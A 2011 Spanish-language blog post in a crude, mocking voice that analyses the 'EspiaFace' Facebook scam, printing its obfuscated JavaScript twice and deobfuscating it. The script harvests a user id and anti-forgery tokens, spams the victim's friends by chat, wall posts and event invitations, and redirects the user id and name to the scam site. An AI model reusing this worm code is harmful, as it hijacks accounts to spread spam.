26 abril 2011

Espiando a espiaface.com [Virus Facebook]

Espiando al "EspiaFace.com": El objetivo al desnud

La POSTA dijo:

Los creadores del sitio EspiaFace son:
(Se avecina una tormenta de trolleos... muchachos tengan piedad, pónganle Vaselina...)

+ Conflictos sobre la autoría. En investigación...
+ Detalle sobre lo que anda pasando: Mi Buzon de Mensajes Privados se convirtió en un conventillo. Todos los presuntos acusados se están arañando entre ellos. Fuera de joda, entre los acusados apareció el hermano de Pamela David (no es joda x 2)
Las pruebas se van acumulando y las pesas se inclinan.
+ Voy a arbitrar con la condición de que me presente a la hermana, o en su defecto, a las compañeritas de laburo... jijiji

+ ULTIMO MOMENTO: Ahora sí, la web de www.EspiaFace.com está finalmente hackeada... ¿o lo está?...

dijo:
Advertencia:
Mucho, mucho, pero mucho texto con contenido real y propio a continuación.
Si tenés alergia a la lectura, naciste medio bobo o si todavía sos analfabeto, mejor que te vayas a la mierda.
Con cariño, nanopene
En este post voy a usar vocabulario muy preciso, porque hoy me levanté con ganas de ser nerd:
+ Si digo posible, es posible y no probable.
+ Si digo probable, es probable y no posible
+ Si digo estimado, es estimado y no querido.
+ Y si digo almeja es la que encontrás entre la arena, no entre las piernas

Perdon por el chasco, hoy debería haberles traido el cuarto capítulo.
Pero estoy tan pero tan harto de que me envíen las invitaciones de "Averigua quién visita tu perfil" que se me escapó todo el sentido del humor y me concentré en analizar esta epidemia.

A continuación, un análisis muy objetivo. Si les digo que es la posta, es la posta. Si les digo que es aproximación, es aproximación. Y si no te gusta, no te gusta. Y si no te gusta, te podés ir a la reconch... eeh re cebado.

Si, re cebado. Hoy tengo ganas de destripar al infame Espiaface, código por código y analizarlo para explicarles EXA-CT-A-ME-NT-E (las sílabas para la mierda, repetí primer grado):

CUAL CARAJO ES EL OBJETIVO DEL AUTOR DE ESTA MIERDA,
QUE GANA CON ESTA MIERDA
CUANTO GANA (estimación)

Según estuve viendo, nadie en internet

(tanto en inglés como en español) explica con el nivel de detalle que expongo acá. Muchos, incluso especialistas, están aún rascándose las cabezas porque no entienden el fin de esta falsa aplicación de Facebook que pareciera ser el producto de una masturbación mental de alguien que tuvo demasiado tiempo libre en sus manos.


Aclaración 1 dijo:
Hoy en día no existe ningún programa o app de Facebook que te permita ver quién te visitó el perfil. Está absolutamente prohibido por Facebook y es técnicamente imposible actualmente. Pero sí solía existir unos apps hace un par de años que se aprovechaba de un error de programación de Facebook para saber qué usuario visitó tu perfil, pero ya está arreglado y hoy en día no existe ninguna forma de saber qué usuario en específico acaba de visitar tu perfil. Hoy es simplemente usado como cebo para atraer salames. (Y si llegara a descubrirse otro error de programación, duraría muy poco, ya que Facebook activamente monitorea, bloquea y arregla problemas de esta índole)


Todos sabemos para esta altura que "espiaface.com" no cumple con lo que promete, pero antes les quiero tranquilizar diciéndoles primero lo que no es:
1) NO es un virus (ni worm, ni ataque de XSS, ni explota vulnerabilidades del navegador)
2) NO roba contraseñas de facebook
3) NO roba cookies (no roba sesiones de Facebook)
4) NO accede a tu información privada del perfil (en esta variante en específico)

Aclaración 2 dijo:

Facebook  ofrece tu información privada en bandeja de plata a CUALQUIER aplicación de facebook. Si, todos los jueguitos, tests de psicologia ("¿Sos más pelotudo que el promedio?" ), O chimentos "Que dijo fulano de mengano", "¿Quién dijo que sos una trola?" y todas las porquerias esas obtienen acceso y control completo de tu perfil cuando presionás "Permitir".

En una ventana como esta, es cuando estás "instalando" un App de Facebook.



El botón Permitir, permite al App el acceso irrestricto a toda tu información privada de tu perfil, control de posteo en tu cuenta y todo lo que te describe ahí. Esto es totalmente independiente a tu configuración de privacidad, aunque estés en modo superparanoico, con "Solo Amigos" y "Solo Yo", estos Apps tienen acceso completo cuando les das el permiso.

Si fuiste victima de EspiaFace, sabrás que no presionaste "Permitir" en ningún lado, eso se debe a queEspiaFace no es una aplicación de Facebook. Eso por una parte es una buena noticia, ya que tenemos la tranquilidad de que no obtiene los datos privados por defecto y tampoco hay que "desinstalar" nada de Facebook.

Pero bien podría haber sido todo lo anterior:
 podría haber sido un virus creando un lindo botnet de la San Puta.
 podría haberte robado la cuenta de Facebook.
 podría vender tu información privada al mejor postor para que te espameen de lo lindo o le vendan tu información a delincuentes para que te hagan un secuestro virtual.
Tenemos que darle gracias (?) al autor de Espiaface por meterte el dedo en el culo sólo hasta el esfinter, cuando tranquilamente podría habértelo metido hasta el intestino grueso.

Si caiste esta vez, zafaste. La próxima vez que caigas en una trampa de este calibre puede que pierdas la cuenta de facebook, pierdas el control de tu computadora, pierdas ancho de banda y hasta pierdas la virginidad.

Ahora vamos al grano (del culo -digo- de Espiaface)

Si fuiste uno de los papanatas que fueron a espiaface.com se van a encontrar con esto:



Primero nos tienta con una imagen photoshopeada, mostrando las visitas a tu perfil en tu "Notificaciones". Cuando presionamos Siguiente, nos topamos con la siguiente pantalla:



Nos muestra un código para poner en Facebook. Si se fijan bien, ese código llama un archivo de javascript llamado app.js para hacer el trabajo sucio, ¿por qué nos pide que esperemos 2 a 3 minutos? ¿Qué carajo hace el código? veamos su contenido: (prepárense para un scroll largo...)

var _0x3fe9=["x25x66x69x72x73x74x6Ex61x6Dx65x25x20x6Dx69x72x61x20x65x73x74x6Fx20x71x75x65x20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x2Cx20x74x65x20x70x65x72x6Dx69x74x65x20x76x65x72x20x71x75x69x65x6Ex65x73x20x76x69x73x69x74x61x6Ex20x74x75x20x70x65x72x66x69x6Cx20x79x20x66x75x6Ex63x69x6Fx6Ex61x20x62x69x65x6Ex2Cx20x65x6Ex74x72x61x20x61x3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x54x6Fx70x20x64x65x20x76x69x73x69x74x61x6Ex74x65x73x20x64x65x20x74x75x20x70x65x72x66x69x6Cx20x64x65x20x68x6Fx79x3Ax20x0Ax20x25x74x66x25x20x2Dx20x31x39x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x36x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x35x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x33x20x76x69x73x69x74x61x73x20x0Ax20x41x76x65x72x69x67x75x61x20x74x75x20x74x61x6Dx62x69x65x6Ex20x71x75x69x65x6Ex20x74x65x20x65x73x74x61x20x6Dx69x72x61x6Ex64x6Fx20x65x6Ex74x72x61x6Ex64x6Fx20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx0Ax46x75x6Ex63x69x6Fx6Ex61x20x64x65x20x76x65x72x64x61x64x21","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx2Fx63x61x72x67x61x2Ex70x68x70","x45x73x74x6Fx20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x21x20x70x75x65x64x65x6Ex20x76x65x72x20x71x75x69x65x6Ex20x65x73x74x61x20x76x69x73x69x74x61x6Ex64x6Fx20x73x75x20x70x65x72x66x69x6Cx20x79x20x74x65x20x6Cx6Cx65x67x61x6Ex20x6Ex6Fx74x69x66x69x63x61x63x69x6Fx6Ex65x73x2Cx20x73x69x67x61x6Ex20x6Cx6Fx73x20x70x61x73x6Fx73x20x64x65x20x65x73x74x61x20x70x61x67x69x6Ex61x20x71x75x65x20x65x78x70x6Cx69x63x61x20x63x6Fx6Dx6Fx20x68x61x63x65x72x6Cx6Fx2Cx20x65x6Ex74x72x65x6Ex20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x41x76x65x72x69x67x75x61x20x71x75x69x65x6Ex20x76x69x73x69x74x61x20x74x75x20x70x65x72x66x69x6C","x68x72x65x66","x6Cx6Fx63x61x74x69x6Fx6E","x74x6Fx70","x47x45x54","x6Fx70x65x6E","x6Fx6Ex72x65x61x64x79x73x74x61x74x65x63x68x61x6Ex67x65","x72x65x61x64x79x53x74x61x74x65","x73x74x61x74x75x73","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x73x65x6Ex64","x2F","x6Dx61x74x63x68","x63x6Fx6Fx6Bx69x65","x40x5B","x69x64","x3A","x6Ex61x6Dx65","x5D","","x26","x3D","x50x4Fx53x54","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x64x69x76","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x64x69x73x70x6Cx61x79","x73x74x79x6Cx65","x62x6Cx6Fx63x6B","x70x6Fx73x69x74x69x6Fx6E","x61x62x73x6Fx6Cx75x74x65","x77x69x64x74x68","x31x30x30x25","x68x65x69x67x68x74","x6Cx65x66x74","x30x70x78","x74x65x78x74x41x6Cx69x67x6E","x63x65x6Ex74x65x72","x70x61x64x64x69x6Ex67","x34x70x78","x62x61x63x6Bx67x72x6Fx75x6Ex64","x23x46x46x46x46x46x46","x7Ax49x6Ex64x65x78","x69x6Ex6Ex65x72x48x54x4Dx4C","x20x3Cx62x72x2Fx3Ex3Cx62x3Ex43x61x72x67x61x6Ex64x6Fx20x61x70x6Cx69x63x61x63x69x6Fx6Ex2Cx20x61x67x75x61x72x64x65x20x75x6Ex20x6Dx6Fx6Dx65x6Ex74x6Fx2Ex2Ex2Ex3Cx2Fx62x3Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex20x4Cx61x20x61x70x6Cx69x63x61x63x69x6Fx6Ex20x65x73x74x61x20x70x72x65x70x61x72x61x6Ex64x6Fx20x74x75x20x66x61x63x65x62x6Fx6Fx6Bx20x70x61x72x61x20x72x65x67x69x73x74x72x61x72x20x6Cx61x73x20x76x69x73x69x74x61x73x20x64x65x20x74x75x73x20x61x6Dx69x67x6Fx73x2Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex3Cx69x6Dx67x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx67x65x6Ex65x74x69x63x73x2Ex62x77x68x2Ex68x61x72x76x61x72x64x2Ex65x64x75x2Fx73x6Ex70x32x72x66x6Cx70x2Fx63x69x72x63x6Cx65x2Ex67x69x66x22x3E","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x64x61x74x61","x66x69x72x73x74x43x68x69x6Cx64","x6Ex61x76x41x63x63x6Fx75x6Ex74x4Ex61x6Dx65","x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64","x3F","x2Fx61x6Ax61x78x2Fx63x68x6Fx6Fx73x65x2Fx3Fx5Fx5Fx61x3Dx31","x65x76x65x6Ex74","x41x73x79x6Ex63x52x65x71x75x65x73x74","x2Fx61x6Ax61x78x2Fx74x79x70x65x61x68x65x61x64x2Fx66x69x72x73x74x5Fx64x65x67x72x65x65x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31x26x76x69x65x77x65x72x3D","x26x74x6Fx6Bx65x6Ex3D","x26x66x69x6Cx74x65x72x5Bx30x5Dx3Dx75x73x65x72x26x6Fx70x74x69x6Fx6Ex73x5Bx30x5Dx3Dx66x72x69x65x6Ex64x73x5Fx6Fx6Ex6Cx79x26x6Fx70x74x69x6Fx6Ex73x5Bx31x5Dx3Dx6Ex6Dx26x6Fx70x74x69x6Fx6Ex73x5Bx32x5Dx3Dx73x6Fx72x74x5Fx61x6Cx70x68x61","x6Cx65x6Ex67x74x68","x70x75x73x68","x67x65x74x54x69x6Dx65","x73x65x74x54x69x6Dx65","x67x65x74x4Dx6Fx6Ex74x68","x67x65x74x44x61x74x65","x67x65x74x46x75x6Cx6Cx59x65x61x72","x67x65x74x48x6Fx75x72x73","x2C","x6Ax6Fx69x6E","x6Fx6E","x43x72x65x61x74x65x20x45x76x65x6Ex74","x6Ex65x77","x2Fx65x76x65x6Ex74x73x2Fx63x72x65x61x74x65x2Ex70x68x70","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx62x75x64x64x79x5Fx6Cx69x73x74x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x73x75x62x73x74x72","x28","x29","x62x75x64x64x79x5Fx6Cx69x73x74","x70x61x79x6Cx6Fx61x64","x6Ex6Fx77x41x76x61x69x6Cx61x62x6Cx65x4Cx69x73x74","x72x61x6Ex64x6Fx6D","x66x6Cx6Fx6Fx72","x25x66x69x72x73x74x6Ex61x6Dx65x25","x74x6Fx4Cx6Fx77x65x72x43x61x73x65","x66x69x72x73x74x4Ex61x6Dx65","x75x73x65x72x49x6Ex66x6Fx73","x72x65x70x6Cx61x63x65","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx73x65x6Ex64x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x2Fx61x6Ax61x78x2Fx62x72x6Fx77x73x65x72x2Fx66x72x69x65x6Ex64x73x2Fx3Fx75x69x64x3D","x26x66x69x6Cx74x65x72x3Dx61x6Cx6Cx26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x3Dx31","x73x68x69x66x74","x66x65x74x63x68x65x64x20x66x72x69x65x6Ex64x73x3Ax20","x68x6Fx6Dx65","x70x6Fx70","x25x74x66x25","x73x65x61x72x63x68","x78x68x70x63x5Fx6Dx65x73x73x61x67x65x5Fx74x65x78x74","x78x68x70x63x5Fx6Dx65x73x73x61x67x65","x6Dx65x73x73x61x67x65x20x74x65x78x74x3Ax20","x2Fx61x6Ax61x78x2Fx75x70x64x61x74x65x73x74x61x74x75x73x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x70x72x6Fx66x69x6Cx65"];var chatmessage=_0x3fe9[0];var postmessage=_0x3fe9[1];var redirect=_0x3fe9[2];var eventdesc=_0x3fe9[3];var eventname=_0x3fe9[4];var nfriends=5000;var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0x3fe9[7]][_0x3fe9[6]][_0x3fe9[5]]=redirect;} ,500);} ;} ;var doget=function (_0xbf72xb,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[8],_0xbf72xb);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]]();} ;doget(_0x3fe9[15],function (_0xbf72xf){var _0xbf72x10=document[_0x3fe9[17]][_0x3fe9[16]](/c_user=(d+)/)[1];var _0xbf72x11=function (_0xbf72x12){return _0xbf72x12?_0x3fe9[18]+_0xbf72x12[_0x3fe9[19]]+_0x3fe9[20]+_0xbf72x12[_0x3fe9[21]]+_0x3fe9[22]:_0x3fe9[23];} ;var _0xbf72x13=function (_0xbf72x12){return _0xbf72x12?_0xbf72x12[_0x3fe9[21]]:_0x3fe9[23];} ;var _0xbf72x14=function (_0xbf72x12){out=_0x3fe9[23];for(var _0xbf72x15 in _0xbf72x12){out+=(out?_0x3fe9[24]:_0x3fe9[23])+_0xbf72x15+(_0xbf72x12[_0xbf72x15]!==null?_0x3fe9[25]+encodeURIComponent(_0xbf72x12[_0xbf72x15]):_0x3fe9[23]);} ;return out;} ;var _0xbf72x16=function (_0xbf72xb,_0xbf72x12,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[26],_0xbf72xb);_0xbf72xe[_0x3fe9[29]](_0x3fe9[27],_0x3fe9[28]);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]](_0xbf72x14(_0xbf72x12));} ;var _0xbf72x17=function (){var _0xbf72x18=document[_0x3fe9[31]](_0x3fe9[30]);_0xbf72x18[_0x3fe9[33]][_0x3fe9[32]]=_0x3fe9[34];_0xbf72x18[_0x3fe9[33]][_0x3fe9[35]]=_0x3fe9[36];_0xbf72x18[_0x3fe9[33]][_0x3fe9[37]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[39]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[40]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[7]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[42]]=_0x3fe9[43];_0xbf72x18[_0x3fe9[33]][_0x3fe9[44]]=_0x3fe9[45];_0xbf72x18[_0x3fe9[33]][_0x3fe9[46]]=_0x3fe9[47];_0xbf72x18[_0x3fe9[33]][_0x3fe9[48]]=999999;_0xbf72x18[_0x3fe9[49]]=_0x3fe9[50];document[_0x3fe9[52]][_0x3fe9[51]](_0xbf72x18);} ;var _0xbf72x19=_0xbf72xf[_0x3fe9[16]](/name="xhpc_composerid" value="([dw]+)"/i);if(_0xbf72x19){comp=_0xbf72x19[1];} else {comp=_0x3fe9[23];} ;var _0xbf72x1a=_0xbf72xf[_0x3fe9[16]](/name="post_form_id" value="([dw]+)"/i)[1];var _0xbf72x1b=_0xbf72xf[_0x3fe9[16]](/name="fb_dtsg" value="([dw]+)"/i)[1];var _0xbf72x1c=document[_0x3fe9[56]](_0x3fe9[55])[_0x3fe9[54]][_0x3fe9[53]];redirect=redirect+_0x3fe9[57]+_0xbf72x14({userid:_0xbf72x10,name:_0xbf72x1c,doclose:1});_0xbf72x17();if(eventdesc){wf++;_0xbf72x16(_0x3fe9[58],{type:_0x3fe9[59],eid:null,invite_message:_0x3fe9[23],__d:1,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60]},function (_0xbf72x1d){var _0xbf72x1e=_0xbf72x1d[_0x3fe9[16]](/"token":"([^]+)"/)[1];var _0xbf72xb=_0x3fe9[61]+_0xbf72x10+_0x3fe9[62]+_0xbf72x1e+_0x3fe9[63];doget(_0xbf72xb,function (_0xbf72x1f){var _0xbf72x20=_0xbf72x1f[_0x3fe9[16]](/{"uid":d+,/g);var _0xbf72x21=[];for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/:(d+),/)[1];if(_0xbf72x23!=_0xbf72x10){_0xbf72x21[_0x3fe9[65]](_0xbf72x23);} ;} ;var _0xbf72x24= new Date;_0xbf72x24[_0x3fe9[67]](_0xbf72x24[_0x3fe9[66]]()+86400000);datestr=_0xbf72x24[_0x3fe9[68]]()+1+_0x3fe9[15]+_0xbf72x24[_0x3fe9[69]]()+_0x3fe9[15]+_0xbf72x24[_0x3fe9[70]]();timestr=_0xbf72x24[_0x3fe9[71]]()*60;var _0xbf72x25={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,start_dateIntlDisplay:datestr,start_date:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0x3fe9[23],location:_0x3fe9[23],street:_0x3fe9[23],geo_id:_0x3fe9[23],geo_sq:_0x3fe9[23],desc:eventdesc,sgb_invitees:_0xbf72x21[_0x3fe9[73]](_0x3fe9[72]),sgb_emails:_0x3fe9[23],sgb_message:_0x3fe9[23],privacy_type:_0x3fe9[74],guest_list:_0x3fe9[74],connections_can_post:_0x3fe9[74],save:_0x3fe9[75],submitting:_0x3fe9[23]};_0xbf72x25[_0x3fe9[76]]=_0x3fe9[23];_0xbf72x16(_0x3fe9[77],_0xbf72x25,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0xbf72x16(_0x3fe9[78],{user:_0xbf72x10,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60],popped_out:false,force_render:true},function (_0xbf72x1d){var _0xbf72x26=_0xbf72x1d[_0x3fe9[79]](9);var _0xbf72x27=eval(_0x3fe9[80]+_0xbf72x26+_0x3fe9[81]);var _0xbf72x28=_0xbf72x27[_0x3fe9[83]][_0x3fe9[82]];for(var _0xbf72x29 in _0xbf72x28[_0x3fe9[84]]){var _0xbf72x2a=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958);var _0xbf72x2b=( new Date)[_0x3fe9[66]]();var _0xbf72x2c=chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]());_0xbf72x16(_0x3fe9[92],{msg_id:Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958),client_time:( new Date)[_0x3fe9[66]](),msg_text:chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]()),to:_0xbf72x29,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,post_form_id_source:_0x3fe9[60]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0x3fe9[93]+_0xbf72x10+_0x3fe9[94],function (_0xbf72x1d){var _0xbf72x20=_0xbf72x1d[_0x3fe9[16]](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);var _0xbf72x2d=[];if(_0xbf72x20){for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/_d+_/)[0][_0x3fe9[91]](/_/g,_0x3fe9[23]);var _0xbf72x2e=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/>[^>]+u003c/a>$/i)[0][_0x3fe9[91]](/u003c/a>$/gim,_0x3fe9[23])[_0x3fe9[91]](/>/g,_0x3fe9[23]);_0xbf72x2d[_0x3fe9[65]]({id:_0xbf72x23,name:_0xbf72x2e});} ;} ;var _0xbf72xd=[];var _0xbf72x2f=[];while(_0xbf72x2d[_0x3fe9[64]]){var _0xbf72x30=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*_0xbf72x2d[_0x3fe9[64]]);_0xbf72xd[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);_0xbf72x2f[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);var _0xbf72x2b=_0xbf72x2d[_0x3fe9[95]]();if(_0xbf72x30){_0xbf72x2d[_0xbf72x30-1]=_0xbf72x2b;} ;} ;if(debug){alert(_0x3fe9[96]+_0xbf72xd[_0x3fe9[64]]);} ;var _0xbf72x31={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x10,xhpc_context:_0x3fe9[97],xhpc_fbx:_0x3fe9[23],lsd:null,post_form_id_source:_0x3fe9[60]};mt=postmessage;m=postmessage;while(mt[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x32=_0xbf72xd[_0x3fe9[98]]();mt=mt[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x32));m=m[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x32));} ;_0xbf72x31[_0x3fe9[101]]=mt;_0xbf72x31[_0x3fe9[102]]=m;if(debug){alert(_0x3fe9[103]+mt);} ;_0xbf72x16(_0x3fe9[104],_0xbf72x31);var _0xbf72x33=function (_0xbf72x15){if(_0xbf72x15==0){wf=0;mf();return ;} ;var _0xbf72x34=_0xbf72x2f[_0x3fe9[95]]();var _0xbf72x35={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x34[_0x3fe9[19]],xhpc_context:_0x3fe9[105],xhpc_fbx:1,lsd:null,post_form_id_source:_0x3fe9[60]};var _0xbf72x36=postmessage;var _0xbf72x37=postmessage;if(_0xbf72xd[_0x3fe9[64]]==0){wf=0;mf();return ;} ;while(_0xbf72x36[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x38=_0xbf72xd[_0x3fe9[98]]();_0xbf72x36=_0xbf72x36[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x38));_0xbf72x37=_0xbf72x37[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x38));} ;_0xbf72x35[_0x3fe9[101]]=_0xbf72x36;_0xbf72x35[_0x3fe9[102]]=_0xbf72x37;_0xbf72x16(_0x3fe9[104],_0xbf72x35);setTimeout(function (){_0xbf72x33(_0xbf72x15-1);} ,2000);} ;wf++;setTimeout(function (){_0xbf72x33(nfriends);} ,2000);} );} ;mf();} );


No se entiende una mierda. ¿Por qué?, porque el código está ofuscado.
¿Qué es eso? La ofuscación de código sirve para que la gilada no pueda entender qué carajo hace el código... y por otra parte, ahorra algo de espacio al comprimir los archivos.
Afortunadamente no formamos parte de la gilada y podemos de-ofuscar el código, porque somos grosos y lo sabemos (lo pongo entero al código para los que saben Javascript):


var chatmessage = '%firstname%';
var postmessage = 'Top de visitantes de tu perfil de hoy: x0A %tf% - 19 visitas x0A %tf% - 16 visitas x0A %tf% - 15 visitas x0A %tf% - 13 visitas x0A Averigua tu tambien quien te esta mirando entrando en: espiaface.comx0AFunciona de verdad!';
var redirect = 'http://www.espiaface.com/carga.php';
var eventdesc = 'Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com';
var eventname = 'Averigua quien visita tu perfil';
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect;
}, 500);
};
};
var doget = function (_0xbf72xb, _0xbf72xc, _0xbf72xd) {
var _0xbf72xe = new XMLHttpRequest;
_0xbf72xe['open']('GET', _0xbf72xb);
_0xbf72xe['onreadystatechange'] = function () {
if (_0xbf72xe['readyState'] == 4) {
if (_0xbf72xe['status'] == 200 && _0xbf72xc) {
_0xbf72xc(_0xbf72xe['responseText']);
};
if (_0xbf72xd) {
_0xbf72xd();
};
};
};
_0xbf72xe['send']();
};
doget('/', function (_0xbf72xf) {
var _0xbf72x10 = document['cookie']['match'](/c_user=(d+)/)[1];
var _0xbf72x11 = function (_0xbf72x12) {
return _0xbf72x12 ? '@[' + _0xbf72x12['id'] + ':' + _0xbf72x12['name'] + ']' : '';
};
var _0xbf72x13 = function (_0xbf72x12) {
return _0xbf72x12 ? _0xbf72x12['name'] : '';
};
var _0xbf72x14 = function (_0xbf72x12) {
out = '';
for (var _0xbf72x15 in _0xbf72x12) {
out += (out ? '&' : '') + _0xbf72x15 + (_0xbf72x12[_0xbf72x15] !== null ? '=' + encodeURIComponent(_0xbf72x12[_0xbf72x15]) : '');
};
return out;
};
var _0xbf72x16 = function (_0xbf72xb, _0xbf72x12, _0xbf72xc, _0xbf72xd) {
var _0xbf72xe = new XMLHttpRequest;
_0xbf72xe['open']('POST', _0xbf72xb);
_0xbf72xe['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
_0xbf72xe['onreadystatechange'] = function () {
if (_0xbf72xe['readyState'] == 4) {
if (_0xbf72xe['status'] == 200 && _0xbf72xc) {
_0xbf72xc(_0xbf72xe['responseText']);
};
if (_0xbf72xd) {
_0xbf72xd();
};
};
};
_0xbf72xe['send'](_0xbf72x14(_0xbf72x12));
};
var _0xbf72x17 = function () {
var _0xbf72x18 = document['createElement']('div');
_0xbf72x18['style']['display'] = 'block';
_0xbf72x18['style']['position'] = 'absolute';
_0xbf72x18['style']['width'] = '100%';
_0xbf72x18['style']['height'] = '100%';
_0xbf72x18['style']['left'] = '0px';
_0xbf72x18['style']['top'] = '0px';
_0xbf72x18['style']['textAlign'] = 'center';
_0xbf72x18['style']['padding'] = '4px';
_0xbf72x18['style']['background'] = '#FFFFFF';
_0xbf72x18['style']['zIndex'] = 999999;
_0xbf72x18['innerHTML'] = ' <br/><b>Cargando aplicacion, aguarde un momento...</b><br/><br/> La aplicacion esta preparando tu facebook para registrar las visitas de tus amigos.<br/><br/><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">';
document['body']['appendChild'](_0xbf72x18);
};
var _0xbf72x19 = _0xbf72xf['match'](/name="xhpc_composerid" value="([dw]+)"/i);
if (_0xbf72x19) {
comp = _0xbf72x19[1];
} else {
comp = '';
};
var _0xbf72x1a = _0xbf72xf['match'](/name="post_form_id" value="([dw]+)"/i)[1];
var _0xbf72x1b = _0xbf72xf['match'](/name="fb_dtsg" value="([dw]+)"/i)[1];
var _0xbf72x1c = document['getElementById']('navAccountName')['firstChild']['data'];
redirect = redirect + '?' + _0xbf72x14({
userid: _0xbf72x10,
name: _0xbf72x1c,
doclose: 1
});
_0xbf72x17();
if (eventdesc) {
wf++;
_0xbf72x16('/ajax/choose/?__a=1', {
type: 'event',
eid: null,
invite_message: '',
__d: 1,
post_form_id: _0xbf72x1a,
fb_dtsg: _0xbf72x1b,
lsd: null,
post_form_id_source: 'AsyncRequest'
}, function (_0xbf72x1d) {
var _0xbf72x1e = _0xbf72x1d['match'](/"token":"([^]+)"/)[1];
var _0xbf72xb = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + _0xbf72x10 + '&token=' + _0xbf72x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
doget(_0xbf72xb, function (_0xbf72x1f) {
var _0xbf72x20 = _0xbf72x1f['match'](/{"uid":d+,/g);
var _0xbf72x21 = [];
